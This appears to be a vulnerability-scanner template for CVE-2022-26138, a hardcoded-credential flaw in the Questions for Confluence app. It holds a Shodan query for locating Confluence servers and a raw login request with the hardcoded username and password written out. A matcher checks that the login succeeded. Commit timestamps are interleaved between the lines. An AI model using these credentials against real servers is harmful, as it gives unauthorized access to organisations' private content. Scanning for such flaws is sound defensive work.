2022-07-21 15:23:23 +00:00
id : CVE-2022-26138
info :
name : Questions For Confluence - Hardcoded Credentials
author : HTTPVoid
severity : critical
description : |
A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group.
reference :
- https://twitter.com/fluepke/status/1549892089181257729
- https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26138
2022-07-21 15:35:47 +00:00
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
2022-07-21 15:23:23 +00:00
classification :
cve-id : CVE-2022-26138
2022-07-21 15:35:47 +00:00
metadata :
shodan-query : http.component:"Atlassian Confluence"
2022-07-29 15:56:00 +00:00
tags : cve,cve2022,confluence,atlassian,default-login,kev
2022-07-21 15:23:23 +00:00
requests :
- raw :
- |
POST /dologin.action HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action
attack : pitchfork
payloads :
os_username :
- disabledsystemuser
os_password :
- disabled1system1user6708
matchers :
- type : dsl
dsl :
- 'location == "/httpvoid.action"'